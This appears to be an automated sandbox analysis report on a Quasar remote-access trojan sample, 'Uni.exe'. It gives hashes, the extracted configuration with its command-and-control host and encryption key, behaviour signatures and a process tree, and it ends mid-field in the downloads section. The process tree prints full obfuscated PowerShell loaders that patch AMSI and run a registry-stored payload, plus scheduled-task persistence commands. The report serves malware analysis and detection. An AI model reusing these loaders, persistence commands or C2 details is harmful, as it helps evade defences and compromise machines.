Analysis

  • max time kernel
    1800s
  • max time network
    1792s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    08-05-2024 17:28

General

  • Target

    Uni.exe

  • Size

    409KB

  • MD5

    7417c8c73e614f293152575f46134216

  • SHA1

    cc68f7f5e7c769efb5b3e06bfb3a2f9329f37805

  • SHA256

    00c7cb06bebe0da961155dc00f7ea7f96a3b04c89ae82408e7ece6968c91c3c3

  • SHA512

    897a859e609028157f2721d76b97497d4b9f821d2b8be3359d1192ddc3a83d4b7449db25c63c3c260067b796c122194c48747dc611c98dc1e33aab82a20b98b0

  • SSDEEP

    6144:nMr2pJAJcC0B632U3GRbMfgvKFFhTEDPX1NbKoEn5MSU+h2f8/14m:LpyJcC+82U3GRGGp1M5Ys2f8/6m

Malware Config

Extracted

Family

quasar

Version

3.1.5

Botnet

SLAVE

C2

even-lemon.gl.at.ply.gg:33587

Mutex

$Sxr-dOMA5C0pQTTpKjVsCp

Attributes
  • encryption_key

    UBXs44u6E81wxBGZxQHk

  • install_name

    $sxr-powershell.exe

  • log_directory

    $SXR-KEYLOGS

  • reconnect_delay

    3000

  • startup_key

    $sxr-powershell

  • subdirectory

    $sxr-seroxen2

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 17 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:580
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:996
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{c3f115d1-2c9d-4bb1-89fe-80f850c35d88}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4456
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{e2019893-afb8-471e-bf8e-0ee3d60d5c3d}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:4612
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
        • Suspicious use of WriteProcessMemory
        PID:636
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
        1⤵
          PID:740
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
          1⤵
            PID:896
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
            1⤵
              PID:352
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
              1⤵
                PID:372
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
                1⤵
                  PID:588
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                  1⤵
                  • Drops file in System32 directory
                  • Suspicious use of WriteProcessMemory
                  PID:1056
                  • c:\windows\system32\taskhostw.exe
                    taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                    2⤵
                      PID:2820
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:jbPJSzZstDIu{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$RdhVmqwPfFyDgc,[Parameter(Position=1)][Type]$JxHIxBEqjd)$nZsbqJEnqnh=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+'ct'+[Char](101)+''+'d'+''+[Char](68)+''+'e'+''+[Char](108)+'e'+[Char](103)+''+'a'+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'Me'+[Char](109)+''+'o'+''+'r'+''+[Char](121)+'M'+'o'+''+[Char](100)+''+[Char](117)+''+[Char](108)+'e',$False).DefineType('M'+[Char](121)+'D'+[Char](101)+''+'l'+''+[Char](101)+'g'+'a'+''+[Char](116)+''+[Char](101)+''+'T'+''+[Char](121)+''+'p'+'e','C'+'l'+''+'a'+''+[Char](115)+'s,'+[Char](80)+'u'+'b'+''+[Char](108)+'i'+[Char](99)+',S'+'e'+''+[Char](97)+''+[Char](108)+''+[Char](101)+'d'+[Char](44)+'A'+[Char](110)+'si'+'C'+'l'+'a'+''+[Char](115)+''+[Char](115)+','+[Char](65)+''+[Char](117)+''+'t'+''+[Char](111)+'Cl'+[Char](97)+'s'+[Char](115)+'',[MulticastDelegate]);$nZsbqJEnqnh.DefineConstructor(''+[Char](82)+''+'T'+'Spe'+[Char](99)+''+'i'+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+'m'+''+[Char](101)+''+','+''+[Char](72)+''+'i'+'de'+'B'+''+'y'+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+','+''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$RdhVmqwPfFyDgc).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+'t'+''+[Char](105)+'m'+[Char](101)+''+[Char](44)+''+'M'+''+'a'+''+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+[Char](100)+'');$nZsbqJEnqnh.DefineMethod(''+'I'+''+'n'+''+'v'+''+[Char](111)+''+'k'+''+'e'+'',''+'P'+''+[Char](117)+'b'+[Char](108)+'i'+'c'+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+'g,'+'N'+''+[Char](101)+''+[Char](119)+''+'S'+''+[Char](108)+''+[Char](111)+''+'t'+','+'V'+''+'i'+'r'+[Char](116)+'u'+[Char](97)+''+'l'+'',$JxHIxBEqjd,$RdhVmqwPfFyDgc).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'n'+'t'+''+[Char](105)+''+[Char](109)+''+'e'+''+[Char](44)+''+[Char](77)+'a'+[Char](110)+''+[Char](97)+'g'+'e'+''+[Char](100)+'');Write-Output $nZsbqJEnqnh.CreateType();}$nXQURgOPfvIHr=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+''+'t'+''+'e'+'m'+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+'i'+''+[Char](99)+''+[Char](114)+''+'o'+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+'3'+[Char](50)+''+[Char](46)+''+[Char](85)+''+'n'+''+[Char](115)+''+[Char](97)+''+[Char](102)+'e'+[Char](78)+''+'a'+'t'+[Char](105)+''+[Char](118)+''+[Char](101)+''+[Char](77)+'e'+[Char](116)+'h'+[Char](111)+''+[Char](100)+''+[Char](115)+'');$JETkrqmFnoFXFL=$nXQURgOPfvIHr.GetMethod('Ge'+[Char](116)+'P'+[Char](114)+'o'+'c'+''+[Char](65)+''+'d'+'dr'+'e'+'s'+[Char](115)+'',[Reflection.BindingFlags]('P'+'u'+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+'t'+''+'a'+''+[Char](116)+'i'+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$SaDjIeMzjqrUBJrNuuo=jbPJSzZstDIu @([String])([IntPtr]);$ypcFRbzSdxDpdSlnsHJwZJ=jbPJSzZstDIu @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$hhJxVDJUwYq=$nXQURgOPfvIHr.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+'M'+''+[Char](111)+'d'+'u'+''+'l'+'e'+'H'+''+[Char](97)+'ndl'+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+[Char](101)+''+[Char](114)+''+[Char](110)+''+[Char](101)+'l'+[Char](51)+''+[Char](50)+''+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'')));$vgSeqFzYjYvOHN=$JETkrqmFnoFXFL.Invoke($Null,@([Object]$hhJxVDJUwYq,[Object](''+'L'+''+[Char](111)+''+'a'+''+[Char](100)+''+[Char](76)+''+[Char](105)+''+[Char](98)+'r'+[Char](97)+''+[Char](114)+''+'y'+''+[Char](65)+'')));$fDZeSTLdqswvUBrGW=$JETkrqmFnoFXFL.Invoke($Null,@([Object]$hhJxVDJUwYq,[Object](''+[Char](86)+'i'+[Char](114)+'t'+'u'+''+[Char](97)+''+[Char](108)+''+[Char](80)+''+'r'+''+[Char](111)+''+'t'+''+'e'+'c'+[Char](116)+'')));$pBqoDhy=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($vgSeqFzYjYvOHN,$SaDjIeMzjqrUBJrNuuo).Invoke(''+[Char](97)+'m'+'s'+''+'i'+''+'.'+''+[Char](100)+''+[Char](108)+''+'l'+'');$qeZmpWYHGRlTGeMaW=$JETkrqmFnoFXFL.Invoke($Null,@([Object]$pBqoDhy,[Object]('A'+'m'+''+[Char](115)+''+'i'+''+[Char](83)+'c'+[Char](97)+''+'n'+''+'B'+''+[Char](117)+'f'+[Char](102)+'e'+[Char](114)+'')));$SeYzFHRcDC=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($fDZeSTLdqswvUBrGW,$ypcFRbzSdxDpdSlnsHJwZJ).Invoke($qeZmpWYHGRlTGeMaW,[uint32]8,4,[ref]$SeYzFHRcDC);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$qeZmpWYHGRlTGeMaW,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($fDZeSTLdqswvUBrGW,$ypcFRbzSdxDpdSlnsHJwZJ).Invoke($qeZmpWYHGRlTGeMaW,[uint32]8,0x20,[ref]$SeYzFHRcDC);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+'F'+''+[Char](84)+''+[Char](87)+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](36)+''+[Char](55)+'7'+[Char](115)+'t'+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                      2⤵
                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                      • Drops file in System32 directory
                      • Suspicious use of SetThreadContext
                      • Modifies data under HKEY_USERS
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      PID:5004
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:FONiGeJHWsUI{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$TFwaIARQJurFnF,[Parameter(Position=1)][Type]$vHqHybamUN)$HSIvccKoaPS=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+'f'+[Char](108)+''+[Char](101)+''+[Char](99)+'t'+[Char](101)+'d'+[Char](68)+''+'e'+''+'l'+''+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+[Char](77)+'e'+[Char](109)+''+[Char](111)+''+[Char](114)+''+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+'u'+''+[Char](108)+''+[Char](101)+'',$False).DefineType('M'+'y'+''+'D'+'e'+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+'t'+''+[Char](101)+'T'+'y'+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+'ass,'+[Char](80)+''+[Char](117)+'b'+[Char](108)+'ic'+[Char](44)+''+[Char](83)+'e'+[Char](97)+''+[Char](108)+''+'e'+''+[Char](100)+''+','+''+[Char](65)+''+'n'+'si'+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+'A'+'u'+[Char](116)+''+[Char](111)+''+'C'+''+'l'+''+'a'+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$HSIvccKoaPS.DefineConstructor(''+'R'+''+'T'+''+[Char](83)+''+'p'+''+[Char](101)+'ci'+[Char](97)+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+'Hid'+[Char](101)+''+'B'+'y'+'S'+'i'+[Char](103)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$TFwaIARQJurFnF).SetImplementationFlags('R'+[Char](117)+'nti'+[Char](109)+''+'e'+''+[Char](44)+''+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+'g'+'e'+'d');$HSIvccKoaPS.DefineMethod(''+'I'+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+'b'+'l'+'i'+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+[Char](105)+'de'+'B'+''+'y'+''+[Char](83)+''+'i'+'g'+[Char](44)+'N'+'e'+''+[Char](119)+''+[Char](83)+''+[Char](108)+''+[Char](111)+''+'t'+''+[Char](44)+''+[Char](86)+'i'+[Char](114)+'t'+[Char](117)+''+'a'+''+[Char](108)+'',$vHqHybamUN,$TFwaIARQJurFnF).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+'m'+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+'g'+'e'+'d'+'');Write-Output $HSIvccKoaPS.CreateType();}$GNabIBSCloAii=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+'y'+''+[Char](115)+''+'t'+''+'e'+''+[Char](109)+''+'.'+''+[Char](100)+''+'l'+'l')}).GetType(''+[Char](77)+''+'i'+''+'c'+''+[Char](114)+'o'+[Char](115)+'of'+'t'+''+[Char](46)+''+'W'+''+'i'+'n'+[Char](51)+'2.'+[Char](85)+''+[Char](110)+''+[Char](115)+''+[Char](97)+'f'+'e'+''+'N'+''+[Char](97)+''+[Char](116)+''+'i'+''+[Char](118)+''+'e'+'M'+'e'+''+[Char](116)+''+[Char](104)+''+[Char](111)+''+[Char](100)+'s');$BgzfoeiYqQiETa=$GNabIBSCloAii.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+'P'+''+[Char](114)+''+'o'+''+[Char](99)+''+'A'+'d'+[Char](100)+''+[Char](114)+'es'+[Char](115)+'',[Reflection.BindingFlags]('P'+'u'+''+'b'+''+[Char](108)+'i'+[Char](99)+''+','+''+[Char](83)+''+'t'+'a'+'t'+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$QQggqfPGDpMDyTXCxvE=FONiGeJHWsUI @([String])([IntPtr]);$qkkOGrbhmSzPeumeBHpYhf=FONiGeJHWsUI @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$cCtxrpSfIFh=$GNabIBSCloAii.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+[Char](77)+''+'o'+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+''+[Char](72)+''+[Char](97)+''+'n'+''+'d'+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+'ne'+'l'+''+[Char](51)+'2'+'.'+'dl'+[Char](108)+'')));$HRQpgaJeCFUiML=$BgzfoeiYqQiETa.Invoke($Null,@([Object]$cCtxrpSfIFh,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+'d'+''+'L'+'i'+'b'+''+[Char](114)+''+[Char](97)+'r'+'y'+''+[Char](65)+'')));$jOextWMHONhODUUZT=$BgzfoeiYqQiETa.Invoke($Null,@([Object]$cCtxrpSfIFh,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+'a'+[Char](108)+''+[Char](80)+'r'+'o'+'t'+[Char](101)+'ct')));$QeUfzoY=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($HRQpgaJeCFUiML,$QQggqfPGDpMDyTXCxvE).Invoke(''+[Char](97)+''+'m'+''+[Char](115)+''+'i'+''+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'');$hweLFXUraaEEJtrmy=$BgzfoeiYqQiETa.Invoke($Null,@([Object]$QeUfzoY,[Object](''+[Char](65)+'m'+[Char](115)+'iS'+[Char](99)+'a'+[Char](110)+'B'+'u'+''+'f'+''+[Char](102)+''+[Char](101)+'r')));$yTpuXMUnwX=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($jOextWMHONhODUUZT,$qkkOGrbhmSzPeumeBHpYhf).Invoke($hweLFXUraaEEJtrmy,[uint32]8,4,[ref]$yTpuXMUnwX);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$hweLFXUraaEEJtrmy,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($jOextWMHONhODUUZT,$qkkOGrbhmSzPeumeBHpYhf).Invoke($hweLFXUraaEEJtrmy,[uint32]8,0x20,[ref]$yTpuXMUnwX);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+[Char](70)+'TW'+[Char](65)+'R'+'E'+'').GetValue('$'+[Char](55)+''+[Char](55)+'st'+'a'+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                      2⤵
                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                      • Drops file in System32 directory
                      • Suspicious use of SetThreadContext
                      • Modifies data under HKEY_USERS
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4688
                      • C:\Windows\System32\Conhost.exe
                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        3⤵
                          PID:4724
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
                      1⤵
                      • Drops file in System32 directory
                      PID:1092
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k localservice -s nsi
                      1⤵
                        PID:1180
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                        1⤵
                          PID:1220
                        • c:\windows\system32\svchost.exe
                          c:\windows\system32\svchost.exe -k netsvcs -s Themes
                          1⤵
                            PID:1228
                          • c:\windows\system32\svchost.exe
                            c:\windows\system32\svchost.exe -k localservice -s EventSystem
                            1⤵
                              PID:1248
                            • c:\windows\system32\svchost.exe
                              c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
                              1⤵
                                PID:1388
                              • c:\windows\system32\svchost.exe
                                c:\windows\system32\svchost.exe -k netsvcs -s SENS
                                1⤵
                                  PID:1400
                                • c:\windows\system32\svchost.exe
                                  c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                                  1⤵
                                    PID:1440
                                    • c:\windows\system32\sihost.exe
                                      sihost.exe
                                      2⤵
                                        PID:2408
                                    • c:\windows\system32\svchost.exe
                                      c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
                                      1⤵
                                        PID:1484
                                      • c:\windows\system32\svchost.exe
                                        c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
                                        1⤵
                                          PID:1560
                                        • c:\windows\system32\svchost.exe
                                          c:\windows\system32\svchost.exe -k networkservice -s Dnscache
                                          1⤵
                                            PID:1592
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
                                            1⤵
                                              PID:1640
                                            • c:\windows\system32\svchost.exe
                                              c:\windows\system32\svchost.exe -k localservice -s netprofm
                                              1⤵
                                                PID:1748
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
                                                1⤵
                                                  PID:1780
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
                                                  1⤵
                                                    PID:1788
                                                  • c:\windows\system32\svchost.exe
                                                    c:\windows\system32\svchost.exe -k appmodel -s StateRepository
                                                    1⤵
                                                      PID:1820
                                                    • c:\windows\system32\svchost.exe
                                                      c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                                                      1⤵
                                                        PID:1932
                                                      • C:\Windows\System32\spoolsv.exe
                                                        C:\Windows\System32\spoolsv.exe
                                                        1⤵
                                                          PID:2016
                                                        • c:\windows\system32\svchost.exe
                                                          c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
                                                          1⤵
                                                            PID:1696
                                                          • c:\windows\system32\svchost.exe
                                                            c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
                                                            1⤵
                                                              PID:2172
                                                            • c:\windows\system32\svchost.exe
                                                              c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
                                                              1⤵
                                                                PID:2432
                                                              • c:\windows\system32\svchost.exe
                                                                c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
                                                                1⤵
                                                                  PID:2440
                                                                • c:\windows\system32\svchost.exe
                                                                  c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                                                                  1⤵
                                                                    PID:2456
                                                                  • c:\windows\system32\svchost.exe
                                                                    c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                                                                    1⤵
                                                                      PID:2496
                                                                    • c:\windows\system32\svchost.exe
                                                                      c:\windows\system32\svchost.exe -k netsvcs -s Browser
                                                                      1⤵
                                                                        PID:2636
                                                                      • C:\Windows\sysmon.exe
                                                                        C:\Windows\sysmon.exe
                                                                        1⤵
                                                                          PID:2668
                                                                        • c:\windows\system32\svchost.exe
                                                                          c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
                                                                          1⤵
                                                                          • Drops file in System32 directory
                                                                          PID:2688
                                                                        • c:\windows\system32\svchost.exe
                                                                          c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
                                                                          1⤵
                                                                            PID:2716
                                                                          • c:\windows\system32\svchost.exe
                                                                            c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                                                                            1⤵
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:2732
                                                                          • c:\windows\system32\svchost.exe
                                                                            c:\windows\system32\svchost.exe -k netsvcs -s WpnService
                                                                            1⤵
                                                                              PID:2752
                                                                            • c:\windows\system32\svchost.exe
                                                                              c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker
                                                                              1⤵
                                                                                PID:2796
                                                                              • C:\Windows\Explorer.EXE
                                                                                C:\Windows\Explorer.EXE
                                                                                1⤵
                                                                                  PID:1908
                                                                                  • C:\Users\Admin\AppData\Local\Temp\Uni.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\Uni.exe"
                                                                                    2⤵
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:3104
                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                      "schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Uni.exe" /rl HIGHEST /f
                                                                                      3⤵
                                                                                      • Creates scheduled task(s)
                                                                                      PID:408
                                                                                    • C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe
                                                                                      "C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe"
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:2748
                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                        "schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe" /rl HIGHEST /f
                                                                                        4⤵
                                                                                        • Creates scheduled task(s)
                                                                                        PID:4204
                                                                                      • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\install.exe"
                                                                                        4⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:4028
                                                                                    • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\install.exe"
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:1516
                                                                                    • C:\Windows\SysWOW64\SCHTASKS.exe
                                                                                      "SCHTASKS.exe" /create /tn "$77Uni.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\Uni.exe'" /sc onlogon /rl HIGHEST
                                                                                      3⤵
                                                                                      • Creates scheduled task(s)
                                                                                      PID:4888
                                                                                • C:\Windows\system32\wbem\unsecapp.exe
                                                                                  C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                  1⤵
                                                                                    PID:3228
                                                                                  • C:\Windows\System32\RuntimeBroker.exe
                                                                                    C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                    1⤵
                                                                                      PID:3748
                                                                                    • C:\Windows\system32\DllHost.exe
                                                                                      C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                      1⤵
                                                                                        PID:3972
                                                                                      • c:\windows\system32\svchost.exe
                                                                                        c:\windows\system32\svchost.exe -k localservice -s CDPSvc
                                                                                        1⤵
                                                                                          PID:4776
                                                                                        • c:\windows\system32\svchost.exe
                                                                                          c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
                                                                                          1⤵
                                                                                            PID:4404
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
                                                                                            1⤵
                                                                                            • Modifies data under HKEY_USERS
                                                                                            PID:2896
                                                                                          • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                            "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                            1⤵
                                                                                            • Drops file in System32 directory
                                                                                            • Modifies data under HKEY_USERS
                                                                                            PID:2840
                                                                                          • c:\windows\system32\svchost.exe
                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
                                                                                            1⤵
                                                                                              PID:4164
                                                                                            • C:\Windows\system32\DllHost.exe
                                                                                              C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                              1⤵
                                                                                                PID:2296
                                                                                              • C:\Windows\system32\ApplicationFrameHost.exe
                                                                                                C:\Windows\system32\ApplicationFrameHost.exe -Embedding
                                                                                                1⤵
                                                                                                  PID:4176
                                                                                                • C:\Windows\System32\InstallAgent.exe
                                                                                                  C:\Windows\System32\InstallAgent.exe -Embedding
                                                                                                  1⤵
                                                                                                    PID:4924
                                                                                                  • C:\Windows\system32\DllHost.exe
                                                                                                    C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
                                                                                                    1⤵
                                                                                                      PID:2836
                                                                                                    • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                      C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                      1⤵
                                                                                                      • Checks BIOS information in registry
                                                                                                      • Checks processor information in registry
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      PID:2568

                                                                                                    Network

                                                                                                    MITRE ATT&CK Enterprise v15

                                                                                                    Replay Monitor

                                                                                                    Loading Replay Monitor...

                                                                                                    Downloads

                                                                                                    • C:\Users\Admin\AppData\Local\Temp\install.exe

                                                                                                      Filesize

                                                                                                      162KB

                                                                                                      MD5

                                                                                                      152e3f07bbaf88fb8b097ba05a60df6e

                                                                                                      SHA1

